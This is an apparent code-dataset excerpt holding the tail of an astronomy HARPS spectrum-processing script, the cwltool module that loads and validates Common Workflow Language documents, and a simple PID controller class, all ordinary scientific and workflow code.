#popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4297.00,3.0)\n \n print()\n print(row['object'],row['spt_obj'])\n #rv,reduced_chisq,gamma,skewness,kurtosis = fit_absorption_line2(wl_, flux_,6562.817,30.0)\n \n rv,reduced_chisq,gamma,skewness,kurtosis,speck1,speck_wl = fit_absorption_line(wl_, flux_,6562.817,20.0, False)\n \n if k==1:\n speck = np.zeros_like(speck1)\n\n print(k)\n speck=((k-1)*speck+speck1)/k\n \n if np.mod(k,100)==0:\n fig, ax1 = plt.subplots(1, 1)\n ax1.plot(speck)\n plt.show()\n \n\n \n #new_wl = wl_*(1+rv/const.c.to(u.km/u.s).value)\n #flux_interpolator = interp1d(wl_, flux_, kind='cubic', bounds_error=False, fill_value=0)\n #new_flux = flux_interpolator(new_wl)\n #_,_,_,_,_ = fit_absorption_line(new_wl, new_flux,6562.817,10.0, True)\n\n \n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4861.332,10.0)\n #continuum,intensity,centrawl,width1sig = popt\n #print(row['object'],\",\",row['mjd_obs'],\",\",rv,\",\",reduced_chisq,\",\",gamma,\",\",skewness,\",\",kurtosis)\n\n \n\n stat_spec_b = {\n 'max_b': None, 'min_b': 
None, 'sum_b': None, 'mean_b': None, 'median_b': None, 'rms_b': None,\n 'skew_b': None, 'kurt_b': None, 'max_bf': None, 'min_bf': None, 'sum_bf': None, 'mean_bf': None,\n 'median_bf': None, 'rms_bf': None, 'skew_bf': None, 'kurt_bf': None\n }\n stat_spec_r = {\n 'max_r': None, 'min_r': None, 'sum_r': None, 'mean_r': None, 'median_r': None, 'rms_r': None,\n 'skew_r': None, 'kurt_r': None, 'max_rf': None, 'min_rf': None, 'sum_rf': None, 'mean_rf': None,\n 'median_rf': None, 'rms_rf': None, 'skew_rf': None, 'kurt_rf': None\n }\n \n if npoints > 150000:\n j_values = [0, 0, 0, 0]\n ranges = [(0, 300), (152100, 152400), (155400, 155700), (npoints - 300, npoints - 1)]\n conditions = [(wl_min_b, 'b'), (wl_max_b, 'b'), (wl_min_r, 'r'), (wl_max_r, 'r')]\n for index, ((start, end), (wl_limit, band)) in enumerate(zip(ranges, conditions)):\n for j in range(start, end):\n wl_prev = wl[0][j - 1]\n wl_curr = wl[0][j]\n if wl_prev < wl_limit <= wl_curr:\n j_values[index] = j\n break\n j1, j2, j3, j4 = j_values\n \n if j1 > 0 and j2 > j1:\n # Unpack max_bf/max_rf properly (the original re-used rms_bf/rms_rf,\n # so the 'max_?f' dictionary entries actually stored the RMS)\n max_b, min_b, sum_b, mean_b, median_b, rms_b, skew_b, kurt_b, max_bf, min_bf, sum_bf, mean_bf, median_bf, rms_bf, skew_bf, kurt_bf = process_spectrum(flux, wl, j1, j2)\n stat_spec_b = {'max_b': max_b, 'min_b': min_b, 'sum_b': sum_b, 'mean_b': mean_b, 'median_b': median_b, 'rms_b': rms_b, 'skew_b': skew_b, 'kurt_b': kurt_b, \n 'max_bf': max_bf, 'min_bf': min_bf, 'sum_bf': sum_bf, 'mean_bf': mean_bf, 'median_bf': median_bf, 'rms_bf': rms_bf, 'skew_bf': skew_bf, 'kurt_bf': kurt_bf}\n\n if j3 > j2 and j3 < j4:\n max_r, min_r, sum_r, mean_r, median_r, rms_r, skew_r, kurt_r, max_rf, min_rf, sum_rf, mean_rf, median_rf, rms_rf, skew_rf, kurt_rf = process_spectrum(flux, wl, j3, j4)\n stat_spec_r = {'max_r': max_r, 'min_r': min_r, 'sum_r': sum_r, 'mean_r': mean_r, 'median_r': median_r, 'rms_r': rms_r, 'skew_r': skew_r, 'kurt_r': kurt_r, \n 'max_rf': max_rf, 'min_rf': min_rf, 'sum_rf': sum_rf, 'mean_rf': mean_rf, 'median_rf': median_rf, 'rms_rf': rms_rf, 'skew_rf': skew_rf, 'kurt_rf': kurt_rf}\n \n all_results.update(stat_spec_b)\n all_results.update(stat_spec_r)\n harps_list_obs.close()\n\n\n######\n######\n######\n######\n######\n\n # Create patterns to search for \"bis\" and \"ccf\" files\n # Check if the length of archive_id_ancillary is greater than 0 and if there is at least one \"bis\" or one \"ccf\" file\n # Process CCF file of this type\n ccf_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_ccf*_A.fits\")\n ccf_files = glob.glob(ccf_pattern)\n ccf_data = process_file(ccf_files, 'ccf', datakw)\n all_results.update(ccf_data)\n\n # Process BIS file of this type\n bis_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_bis*_A.fits\")\n bis_files = glob.glob(bis_pattern)\n bis_data = process_file(bis_files, 'bis', datakw)\n all_results.update(bis_data)\n\n # Process GUIDE file\n gui_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_INT_GUIDE.fits\")\n gui_files = glob.glob(gui_pattern)\n gui_data = process_gui_file(gui_files, datakw)\n all_results.update(gui_data)\n \n \n #print(all_results)\n #print(k)\n\n\n\n\n\n\n\n\n\n\nsys.exit()\n#--------------- END PROGRAM\n\n\n\n\n\n\n\n\n\n\n\n\n\n#radvel = False\n#if radvel == True:\n #em1=np.min(wl) \n #em2=np.max(wl)\n #ix1=np.argmin(np.abs(tpl_wl-em1))\n #ix2=np.argmin(np.abs(tpl_wl-em2))\n #tpl_wl_cut=tpl_wl[ix1:ix2+1]\n\n #results = []\n #max_velocity = +1000 # km/s\n #min_velocity = -1000 # km/s\n #deltalamba_over_lambda = 0.01 / 5500.0\n #vel_c = const.c.to(u.km/u.s).value\n #kost = 
(deltalamba_over_lambda * vel_c)\n ##print(80/kost)\n ##sys.exit()\n #kk=0\n #for flux_template in templates_spectra:\n #tpl_flux_cut = flux_template[ix1:ix2+1]\n #kk += 1\n #if kk >1:\n #break\n ## Calculate the maximum allowed lag for the desired velocity range\n #max_lag = int(max_velocity / kost )\n #min_lag = int(min_velocity / kost )\n ##print(min_lag,max_lag)\n \n ## Limit the range of lags\n #lag = np.arange(min_lag, max_lag + 1)\n #velocities = lag * kost\n #lag = np.arange(-npoints + 1, npoints)\n\n #correlation = correlate(flux_ - np.mean(flux_), tpl_flux_cut - np.mean(tpl_flux_cut), mode='full')\n ## Since the correlation is calculated for a larger range of lags than needed,\n ## slice the correlation array to match the range of lags of interest.\n #start_index = npoints + min_lag\n #end_index = npoints + max_lag + 1\n #correlation = correlation[start_index:end_index]\n \n #radial_velocity = velocities[np.argmax(correlation)]\n #peaks, _ = find_peaks(correlation)\n #results_half = peak_widths(correlation, peaks, rel_height=0.5)\n #fwhm = results_half[0]\n ##print(fwhm)\n #results.extend([radial_velocity, fwhm[0]])\n #rvu=adp_data['tel_targ_radvel']['value']\n #rv_obs=radial_velocity-adp_data['drs_berv']['value']\n #berv=adp_data['drs_berv']['value']\n #rv=rv_obs+berv\n #print(adp_data['date-obs']['value'])\n #print('RVuser = ',rvu)\n #print('RV = ',rv)\n #print('RVu-BERV-RV = ',rvu-rv)\n \n #figures = True\n #if figures == True:\n #plt.figure(figsize=(12, 6))\n #plt.subplot(2, 1, 1)\n #plt.plot(wl_, flux_/np.mean(flux_), label='flux')\n #plt.plot(tpl_wl_cut, tpl_flux_cut/np.mean(tpl_flux_cut)+2, label='tpl_flux_cut')\n #plt.xlabel('Wavelength')\n #plt.ylabel('Flux')\n #plt.legend()\n \n #plt.subplot(2, 1, 2)\n #plt.plot(velocities, correlation, label='correlation')\n #plt.xlabel('Velocity (km/s)')\n #plt.ylabel('Correlation')\n #plt.legend()\n \n #plt.show()\n","repo_name":"barbierimauro/AstronomerHelper","sub_path":"HARPS/check_files_ccfbis.py","file_name":"check_files_ccfbis.py","file_ext":"py","file_size_in_byte":53758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13554879628","text":"\"\"\"Loads a CWL document.\"\"\"\n\nimport copy\nimport hashlib\nimport logging\nimport os\nimport re\nimport urllib\nimport uuid\nfrom functools import partial\nfrom typing import (\n Any,\n Dict,\n List,\n MutableMapping,\n MutableSequence,\n Optional,\n Tuple,\n Union,\n cast,\n)\n\nfrom cwl_utils.parser import cwl_v1_2, cwl_v1_2_utils\nfrom ruamel.yaml.comments import CommentedMap, CommentedSeq\nfrom schema_salad.exceptions import ValidationException\nfrom schema_salad.fetcher import Fetcher\nfrom schema_salad.ref_resolver import Loader, file_uri\nfrom schema_salad.schema import validate_doc\nfrom schema_salad.sourceline import SourceLine, cmap\nfrom schema_salad.utils import (\n ContextType,\n FetcherCallableType,\n IdxResultType,\n ResolveType,\n json_dumps,\n)\n\nfrom . 
import CWL_CONTENT_TYPES, process, update\nfrom .context import LoadingContext\nfrom .errors import GraphTargetMissingException\nfrom .loghandler import _logger\nfrom .process import Process, get_schema, shortname\nfrom .update import ALLUPDATES\nfrom .utils import CWLObjectType, ResolverType, visit_class\n\ndocloaderctx: ContextType = {\n \"cwl\": \"https://w3id.org/cwl/cwl#\",\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"path\": {\"@type\": \"@id\"},\n \"location\": {\"@type\": \"@id\"},\n \"id\": \"@id\",\n}\n\njobloader_id_name = \"__id\"\njobloaderctx: ContextType = {\n \"cwl\": \"https://w3id.org/cwl/cwl#\",\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"path\": {\"@type\": \"@id\"},\n \"location\": {\"@type\": \"@id\"},\n jobloader_id_name: \"@id\",\n}\n\n\noverrides_ctx: ContextType = {\n \"overrideTarget\": {\"@type\": \"@id\"},\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"http://commonwl.org/cwltool#overrides\": {\n \"@id\": \"cwltool:overrides\",\n \"mapSubject\": \"overrideTarget\",\n },\n \"requirements\": {\n \"@id\": \"https://w3id.org/cwl/cwl#requirements\",\n \"mapSubject\": \"class\",\n },\n}\n\n\ndef default_loader(\n fetcher_constructor: Optional[FetcherCallableType] = None,\n enable_dev: bool = False,\n doc_cache: bool = True,\n) -> Loader:\n return Loader(\n docloaderctx,\n fetcher_constructor=fetcher_constructor,\n allow_attachments=lambda r: enable_dev,\n doc_cache=doc_cache,\n )\n\n\ndef resolve_tool_uri(\n argsworkflow: str,\n resolver: Optional[ResolverType] = None,\n fetcher_constructor: Optional[FetcherCallableType] = None,\n document_loader: Optional[Loader] = None,\n) -> Tuple[str, str]:\n uri = None # type: Optional[str]\n split = urllib.parse.urlsplit(argsworkflow)\n # In case of Windows path, urlsplit misjudge Drive letters as scheme, here we are skipping that\n if split.scheme and split.scheme in [\"http\", \"https\", \"file\"]:\n uri = argsworkflow\n elif os.path.exists(os.path.abspath(argsworkflow)):\n uri = file_uri(str(os.path.abspath(argsworkflow)))\n elif resolver is not None:\n uri = resolver(document_loader or default_loader(fetcher_constructor), argsworkflow)\n\n if uri is None:\n raise ValidationException(\"Not found: '%s'\" % argsworkflow)\n\n if argsworkflow != uri:\n _logger.info(\"Resolved '%s' to '%s'\", argsworkflow, uri)\n\n fileuri = urllib.parse.urldefrag(uri)[0]\n return uri, fileuri\n\n\ndef fetch_document(\n argsworkflow: Union[str, CWLObjectType],\n loadingContext: Optional[LoadingContext] = None,\n) -> Tuple[LoadingContext, CommentedMap, str]:\n \"\"\"Retrieve a CWL document.\"\"\"\n if loadingContext is None:\n loadingContext = LoadingContext()\n loadingContext.loader = default_loader()\n else:\n loadingContext = loadingContext.copy()\n if loadingContext.loader is None:\n loadingContext.loader = default_loader(\n loadingContext.fetcher_constructor,\n enable_dev=loadingContext.enable_dev,\n doc_cache=loadingContext.doc_cache,\n )\n\n if isinstance(argsworkflow, str):\n uri, fileuri = resolve_tool_uri(\n argsworkflow,\n resolver=loadingContext.resolver,\n document_loader=loadingContext.loader,\n )\n workflowobj = cast(\n CommentedMap,\n loadingContext.loader.fetch(fileuri, content_types=CWL_CONTENT_TYPES),\n )\n return loadingContext, workflowobj, uri\n if isinstance(argsworkflow, MutableMapping):\n uri = cast(str, argsworkflow[\"id\"]) if argsworkflow.get(\"id\") else \"_:\" + str(uuid.uuid4())\n workflowobj = cast(CommentedMap, cmap(cast(Dict[str, Any], argsworkflow), fn=uri))\n loadingContext.loader.idx[uri] 
= workflowobj\n return loadingContext, workflowobj, uri\n raise ValidationException(\"Must be URI or object: '%s'\" % argsworkflow)\n\n\ndef _convert_stdstreams_to_files(\n workflowobj: Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str, int]], str]\n) -> None:\n if isinstance(workflowobj, MutableMapping):\n if workflowobj.get(\"class\") == \"CommandLineTool\":\n with SourceLine(\n workflowobj,\n \"outputs\",\n ValidationException,\n _logger.isEnabledFor(logging.DEBUG),\n ):\n outputs = workflowobj.get(\"outputs\", [])\n if not isinstance(outputs, CommentedSeq):\n raise ValidationException('\"outputs\" section is not ' \"valid.\")\n for out in cast(MutableSequence[CWLObjectType], workflowobj.get(\"outputs\", [])):\n if not isinstance(out, CommentedMap):\n raise ValidationException(f\"Output {out!r} is not a valid OutputParameter.\")\n for streamtype in [\"stdout\", \"stderr\"]:\n if out.get(\"type\") == streamtype:\n if \"outputBinding\" in out:\n raise ValidationException(\n \"Not allowed to specify outputBinding when\"\n \" using %s shortcut.\" % streamtype\n )\n if streamtype in workflowobj:\n filename = workflowobj[streamtype]\n else:\n filename = str(\n hashlib.sha1( # nosec\n json_dumps(workflowobj, sort_keys=True).encode(\"utf-8\")\n ).hexdigest()\n )\n workflowobj[streamtype] = filename\n out[\"type\"] = \"File\"\n out[\"outputBinding\"] = cmap({\"glob\": filename})\n for inp in cast(MutableSequence[CWLObjectType], workflowobj.get(\"inputs\", [])):\n if inp.get(\"type\") == \"stdin\":\n if \"inputBinding\" in inp:\n raise ValidationException(\n \"Not allowed to specify inputBinding when\" \" using stdin shortcut.\"\n )\n if \"stdin\" in workflowobj:\n raise ValidationException(\n \"Not allowed to specify stdin path when\" \" using stdin type shortcut.\"\n )\n else:\n workflowobj[\"stdin\"] = (\n \"$(inputs.%s.path)\"\n % cast(str, inp[\"id\"]).rpartition(\"#\")[2].split(\"/\")[-1]\n )\n inp[\"type\"] = \"File\"\n else:\n for entry in workflowobj.values():\n _convert_stdstreams_to_files(\n cast(\n Union[\n CWLObjectType,\n MutableSequence[Union[CWLObjectType, str, int]],\n str,\n ],\n entry,\n )\n )\n if isinstance(workflowobj, MutableSequence):\n for entry in workflowobj:\n _convert_stdstreams_to_files(\n cast(\n Union[\n CWLObjectType,\n MutableSequence[Union[CWLObjectType, str, int]],\n str,\n ],\n entry,\n )\n )\n\n\ndef _add_blank_ids(\n workflowobj: Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]]\n) -> None:\n if isinstance(workflowobj, MutableMapping):\n if (\n \"run\" in workflowobj\n and isinstance(workflowobj[\"run\"], MutableMapping)\n and \"id\" not in workflowobj[\"run\"]\n and \"$import\" not in workflowobj[\"run\"]\n ):\n workflowobj[\"run\"][\"id\"] = str(uuid.uuid4())\n for entry in workflowobj.values():\n _add_blank_ids(\n cast(\n Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]],\n entry,\n )\n )\n if isinstance(workflowobj, MutableSequence):\n for entry in workflowobj:\n _add_blank_ids(\n cast(\n Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str]]],\n entry,\n )\n )\n\n\ndef _fast_parser_convert_stdstreams_to_files(\n processobj: Union[cwl_v1_2.Process, MutableSequence[cwl_v1_2.Process]]\n) -> None:\n if isinstance(processobj, cwl_v1_2.CommandLineTool):\n cwl_v1_2_utils.convert_stdstreams_to_files(processobj)\n elif isinstance(processobj, cwl_v1_2.Workflow):\n for st in processobj.steps:\n _fast_parser_convert_stdstreams_to_files(st.run)\n elif isinstance(processobj, MutableSequence):\n for p in processobj:\n 
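# A $graph-style document yields a list of processes; recurse into each.\n 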
_fast_parser_convert_stdstreams_to_files(p)\n\n\ndef _fast_parser_expand_hint_class(\n hints: Optional[Any], loadingOptions: cwl_v1_2.LoadingOptions\n) -> None:\n if isinstance(hints, MutableSequence):\n for h in hints:\n if isinstance(h, MutableMapping) and \"class\" in h:\n for k, v in loadingOptions.namespaces.items():\n if h[\"class\"].startswith(k + \":\"):\n h[\"class\"] = v + h[\"class\"][len(k) + 1 :]\n\n\ndef _fast_parser_handle_hints(\n processobj: Union[cwl_v1_2.Process, MutableSequence[cwl_v1_2.Process]],\n loadingOptions: cwl_v1_2.LoadingOptions,\n) -> None:\n if isinstance(processobj, (cwl_v1_2.CommandLineTool, cwl_v1_2.Workflow)):\n _fast_parser_expand_hint_class(processobj.hints, loadingOptions)\n\n if isinstance(processobj, cwl_v1_2.Workflow):\n for st in processobj.steps:\n _fast_parser_expand_hint_class(st.hints, loadingOptions)\n _fast_parser_handle_hints(st.run, loadingOptions)\n elif isinstance(processobj, MutableSequence):\n for p in processobj:\n _fast_parser_handle_hints(p, loadingOptions)\n\n\ndef update_index(document_loader: Loader, pr: CommentedMap) -> None:\n if \"id\" in pr:\n document_loader.idx[pr[\"id\"]] = pr\n\n\ndef fast_parser(\n workflowobj: Union[CommentedMap, CommentedSeq, None],\n fileuri: Optional[str],\n uri: str,\n loadingContext: LoadingContext,\n fetcher: Fetcher,\n) -> Tuple[Union[CommentedMap, CommentedSeq], CommentedMap]:\n lopt = cwl_v1_2.LoadingOptions(idx=loadingContext.codegen_idx, fileuri=fileuri, fetcher=fetcher)\n\n if uri not in loadingContext.codegen_idx:\n cwl_v1_2.load_document_with_metadata(\n workflowobj,\n fileuri,\n loadingOptions=lopt,\n addl_metadata_fields=[\"id\", \"cwlVersion\"],\n )\n\n objects, loadopt = loadingContext.codegen_idx[uri]\n\n _fast_parser_convert_stdstreams_to_files(objects)\n _fast_parser_handle_hints(objects, loadopt)\n\n processobj: Union[MutableMapping[str, Any], MutableSequence[Any], float, str, None]\n\n processobj = cwl_v1_2.save(objects, relative_uris=False)\n\n metadata: Dict[str, Any] = {}\n metadata[\"id\"] = loadopt.fileuri\n\n if loadopt.namespaces:\n metadata[\"$namespaces\"] = loadopt.namespaces\n if loadopt.schemas:\n metadata[\"$schemas\"] = loadopt.schemas\n if loadopt.baseuri:\n metadata[\"$base\"] = loadopt.baseuri\n for k, v in loadopt.addl_metadata.items():\n if isinstance(processobj, MutableMapping) and k in processobj:\n metadata[k] = processobj[k]\n else:\n metadata[k] = v\n\n if loadingContext.loader:\n loadingContext.loader.graph += loadopt.graph\n\n # Need to match the document loader's index with the fast parser index\n # Get the base URI (no fragments) for documents that use $graph\n nofrag = urllib.parse.urldefrag(uri)[0]\n\n flag = \"fastparser-idx-from:\" + nofrag\n if not loadingContext.loader.idx.get(flag):\n objects, loadopt = loadingContext.codegen_idx[nofrag]\n fileobj = cmap(\n cast(\n Union[int, float, str, Dict[str, Any], List[Any], None],\n cwl_v1_2.save(objects, relative_uris=False),\n )\n )\n visit_class(\n fileobj,\n (\"CommandLineTool\", \"Workflow\", \"ExpressionTool\"),\n partial(update_index, loadingContext.loader),\n )\n loadingContext.loader.idx[flag] = flag\n for u in lopt.imports:\n loadingContext.loader.idx[\"import:\" + u] = \"import:\" + u\n for u in lopt.includes:\n loadingContext.loader.idx[\"include:\" + u] = \"include:\" + u\n\n return cast(\n Union[CommentedMap, CommentedSeq],\n cmap(cast(Union[Dict[str, Any], List[Any]], processobj)),\n ), cast(CommentedMap, cmap(metadata))\n\n\ndef resolve_and_validate_document(\n loadingContext: 
LoadingContext,\n workflowobj: Union[CommentedMap, CommentedSeq],\n uri: str,\n preprocess_only: bool = False,\n) -> Tuple[LoadingContext, str]:\n \"\"\"Validate a CWL document.\"\"\"\n if not loadingContext.loader:\n raise ValueError(\"loadingContext must have a loader.\")\n else:\n loader = loadingContext.loader\n loadingContext = loadingContext.copy()\n\n if not isinstance(workflowobj, MutableMapping):\n raise ValueError(f\"workflowjobj must be a dict, got {type(workflowobj)!r}: {workflowobj}\")\n\n jobobj = None\n if \"cwl:tool\" in workflowobj:\n jobobj, _ = loader.resolve_all(workflowobj, uri)\n uri = urllib.parse.urljoin(uri, workflowobj[\"https://w3id.org/cwl/cwl#tool\"])\n del cast(Dict[str, Any], jobobj)[\"https://w3id.org/cwl/cwl#tool\"]\n\n workflowobj = fetch_document(uri, loadingContext)[1]\n\n fileuri = urllib.parse.urldefrag(uri)[0]\n\n metadata: CWLObjectType\n\n cwlVersion = loadingContext.metadata.get(\"cwlVersion\")\n if not cwlVersion:\n cwlVersion = workflowobj.get(\"cwlVersion\")\n if not cwlVersion and fileuri != uri:\n # The tool we're loading is a fragment of a bigger file. Get\n # the document root element and look for cwlVersion there.\n metadata = cast(CWLObjectType, fetch_document(fileuri, loadingContext)[1])\n cwlVersion = cast(str, metadata.get(\"cwlVersion\"))\n if not cwlVersion:\n raise ValidationException(\n \"No cwlVersion found. \"\n \"Use the following syntax in your CWL document to declare \"\n \"the version: cwlVersion: .\\n\"\n \"Note: if this is a CWL draft-3 (pre v1.0) document then it \"\n \"will need to be upgraded first using https://pypi.org/project/cwl-upgrader/ . \"\n \"'sbg:draft-2' documents can be upgraded using \"\n \"https://pypi.org/project/sevenbridges-cwl-draft2-upgrader/ .\"\n )\n\n if not isinstance(cwlVersion, str):\n with SourceLine(workflowobj, \"cwlVersion\", ValidationException, loadingContext.debug):\n raise ValidationException(f\"'cwlVersion' must be a string, got {type(cwlVersion)}\")\n # strip out version\n cwlVersion = re.sub(r\"^(?:cwl:|https://w3id.org/cwl/cwl#)\", \"\", cwlVersion)\n if cwlVersion not in list(ALLUPDATES):\n # print out all the Supported Versions of cwlVersion\n versions = []\n for version in list(ALLUPDATES):\n if \"dev\" in version:\n version += \" (with --enable-dev flag only)\"\n versions.append(version)\n versions.sort()\n raise ValidationException(\n \"The CWL reference runner no longer supports pre CWL v1.0 \"\n \"documents. Supported versions are: \"\n \"\\n{}\".format(\"\\n\".join(versions))\n )\n\n if isinstance(jobobj, CommentedMap) and \"http://commonwl.org/cwltool#overrides\" in jobobj:\n loadingContext.overrides_list.extend(resolve_overrides(jobobj, uri, uri))\n del jobobj[\"http://commonwl.org/cwltool#overrides\"]\n\n if isinstance(jobobj, CommentedMap) and \"https://w3id.org/cwl/cwl#requirements\" in jobobj:\n if cwlVersion not in (\"v1.1.0-dev1\", \"v1.1\"):\n raise ValidationException(\n \"`cwl:requirements` in the input object is not part of CWL \"\n \"v1.0. 
You can adjust to use `cwltool:overrides` instead; or you \"\n \"can set the cwlVersion to v1.1 or greater.\"\n )\n loadingContext.overrides_list.append(\n {\n \"overrideTarget\": uri,\n \"requirements\": jobobj[\"https://w3id.org/cwl/cwl#requirements\"],\n }\n )\n del jobobj[\"https://w3id.org/cwl/cwl#requirements\"]\n\n (sch_document_loader, avsc_names) = process.get_schema(cwlVersion)[:2]\n\n if isinstance(avsc_names, Exception):\n raise avsc_names\n\n processobj: ResolveType\n document_loader = Loader(\n sch_document_loader.ctx,\n schemagraph=sch_document_loader.graph,\n idx=loader.idx,\n cache=sch_document_loader.cache,\n fetcher_constructor=loadingContext.fetcher_constructor,\n skip_schemas=loadingContext.skip_schemas,\n doc_cache=loadingContext.doc_cache,\n )\n\n loadingContext.loader = document_loader\n\n if cwlVersion == \"v1.0\":\n _add_blank_ids(workflowobj)\n\n if cwlVersion != \"v1.2\":\n loadingContext.fast_parser = False\n\n if loadingContext.skip_resolve_all:\n # Some integrations (e.g. Arvados) loads documents, makes\n # in-memory changes to them (which are applied to the objects\n # in the document_loader index), and then sends them back\n # through the loading machinery.\n #\n # In this case, the functions of resolve_all() have already\n # happened. Because resolve_all() is expensive, we don't want\n # to do it again if it's going to be a no-op, so the\n # skip_resolve_all flag tells us just to use the document\n # as-is from the loader index.\n #\n # Note that at the moment, fast_parser code path is considered\n # functionally the same as resolve_all() for this case.\n #\n processobj, metadata = document_loader.resolve_ref(uri)\n elif loadingContext.fast_parser:\n processobj, metadata = fast_parser(\n workflowobj, fileuri, uri, loadingContext, document_loader.fetcher\n )\n else:\n document_loader.resolve_all(workflowobj, fileuri)\n processobj, metadata = document_loader.resolve_ref(uri)\n\n if not isinstance(processobj, (CommentedMap, CommentedSeq)):\n raise ValidationException(\"Workflow must be a CommentedMap or CommentedSeq.\")\n\n if not hasattr(processobj.lc, \"filename\"):\n processobj.lc.filename = fileuri\n\n if loadingContext.metadata:\n metadata = loadingContext.metadata\n\n # Make a shallow copy. 
If we do a version update later, metadata\n # will be updated, we don't want to write through and change the\n # original object.\n metadata = copy.copy(metadata)\n\n if not isinstance(metadata, CommentedMap):\n raise ValidationException(\"metadata must be a CommentedMap, was %s\" % type(metadata))\n\n if isinstance(processobj, CommentedMap):\n uri = processobj[\"id\"]\n\n if not loadingContext.fast_parser:\n _convert_stdstreams_to_files(workflowobj)\n\n if isinstance(jobobj, CommentedMap):\n loadingContext.jobdefaults = jobobj\n\n loadingContext.avsc_names = avsc_names\n loadingContext.metadata = metadata\n\n if preprocess_only:\n return loadingContext, uri\n\n if loadingContext.do_validate:\n validate_doc(avsc_names, processobj, document_loader, loadingContext.strict)\n\n # None means default behavior (do update)\n if loadingContext.do_update in (True, None):\n if \"cwlVersion\" not in metadata:\n metadata[\"cwlVersion\"] = cwlVersion\n processobj = update.update(\n processobj, document_loader, fileuri, loadingContext.enable_dev, metadata\n )\n document_loader.idx[processobj[\"id\"]] = processobj\n\n visit_class(\n processobj,\n (\"CommandLineTool\", \"Workflow\", \"ExpressionTool\"),\n partial(update_index, document_loader),\n )\n\n return loadingContext, uri\n\n\ndef make_tool(\n uri: Union[str, CommentedMap, CommentedSeq], loadingContext: LoadingContext\n) -> Process:\n \"\"\"Make a Python CWL object.\"\"\"\n if loadingContext.loader is None:\n raise ValueError(\"loadingContext must have a loader\")\n\n resolveduri: Union[float, str, CommentedMap, CommentedSeq, None]\n metadata: CWLObjectType\n\n if loadingContext.fast_parser and isinstance(uri, str) and not loadingContext.skip_resolve_all:\n resolveduri, metadata = fast_parser(\n None, None, uri, loadingContext, loadingContext.loader.fetcher\n )\n else:\n resolveduri, metadata = loadingContext.loader.resolve_ref(uri)\n\n processobj = None\n if isinstance(resolveduri, MutableSequence):\n for obj in resolveduri:\n if obj[\"id\"].endswith(\"#main\"):\n processobj = obj\n break\n if not processobj:\n raise GraphTargetMissingException(\n \"Tool file contains graph of multiple objects, must specify \"\n \"one of #%s\"\n % \", #\".join(urllib.parse.urldefrag(i[\"id\"])[1] for i in resolveduri if \"id\" in i)\n )\n elif isinstance(resolveduri, MutableMapping):\n processobj = resolveduri\n else:\n raise Exception(\"Must resolve to list or dict\")\n\n tool = loadingContext.construct_tool_object(processobj, loadingContext)\n\n if loadingContext.jobdefaults:\n jobobj = loadingContext.jobdefaults\n for inp in tool.tool[\"inputs\"]:\n if shortname(inp[\"id\"]) in jobobj:\n inp[\"default\"] = jobobj[shortname(inp[\"id\"])]\n\n return tool\n\n\ndef load_tool(\n argsworkflow: Union[str, CWLObjectType],\n loadingContext: Optional[LoadingContext] = None,\n) -> Process:\n loadingContext, workflowobj, uri = fetch_document(argsworkflow, loadingContext)\n\n loadingContext, uri = resolve_and_validate_document(\n loadingContext,\n workflowobj,\n uri,\n )\n\n return make_tool(uri, loadingContext)\n\n\ndef resolve_overrides(\n ov: IdxResultType,\n ov_uri: str,\n baseurl: str,\n) -> List[CWLObjectType]:\n ovloader = Loader(overrides_ctx)\n ret, _ = ovloader.resolve_all(ov, baseurl)\n if not isinstance(ret, CommentedMap):\n raise Exception(\"Expected CommentedMap, got %s\" % type(ret))\n cwl_docloader = get_schema(\"v1.0\")[0]\n cwl_docloader.resolve_all(ret, ov_uri)\n return cast(List[CWLObjectType], ret[\"http://commonwl.org/cwltool#overrides\"])\n\n\ndef 
load_overrides(ov: str, base_url: str) -> List[CWLObjectType]:\n    ovloader = Loader(overrides_ctx)\n    return resolve_overrides(ovloader.fetch(ov), ov, base_url)\n\n\ndef recursive_resolve_and_validate_document(\n    loadingContext: LoadingContext,\n    workflowobj: Union[CommentedMap, CommentedSeq],\n    uri: str,\n    preprocess_only: bool = False,\n) -> Tuple[LoadingContext, str, Process]:\n    \"\"\"Validate a CWL document, checking that a tool object can be built.\"\"\"\n    loadingContext, uri = resolve_and_validate_document(\n        loadingContext,\n        workflowobj,\n        uri,\n        preprocess_only=preprocess_only,\n    )\n    tool = make_tool(uri, loadingContext)\n    return loadingContext, uri, tool\n","repo_name":"common-workflow-language/cwltool","sub_path":"cwltool/load_tool.py","file_name":"load_tool.py","file_ext":"py","file_size_in_byte":24252,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"72"} +{"seq_id":"5261507497","text":"import numpy as np\nimport rospy\n\nclass PIDControllerBase():\n    def __init__(self, _p, _i, _d, _sat):\n        # gains: _p -> proportional, _i -> integral, _d -> derivative\n        self.Kp = _p\n        self.Ki = _i\n        self.Kd = _d\n        self.sat = _sat\n\n        self.integral = 0 \n        self.prev_err = 0\n        self.prev_t = -1.0\n    \n    def regulate(self, _err, _t, id_val):\n        derr_dt = 0.0\n        dt = _t - self.prev_t\n        if self.prev_t > 0.0 and dt > 0.0:\n            derr_dt = (_err - self.prev_err) / dt\n            self.integral += 0.5 * (_err + self.prev_err) * dt\n\n        u = self.Kp * _err + self.Kd * derr_dt + self.Ki * self.integral\n\n        self.prev_err = _err\n        self.prev_t = _t\n\n        if (np.linalg.norm(u) > self.sat):\n            # controller is in saturation: limit output, reset integral\n            u = self.sat * u / np.linalg.norm(u)\n            self.integral = 0.0\n\n        return u\n","repo_name":"crvogt/spacecraft_sim","sub_path":"sc_control/src/PID/PIDControllerBase.py","file_name":"PIDControllerBase.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21968536","text":"\nimport pandas as pd\n\nfrom . import module_dir\nfrom . 
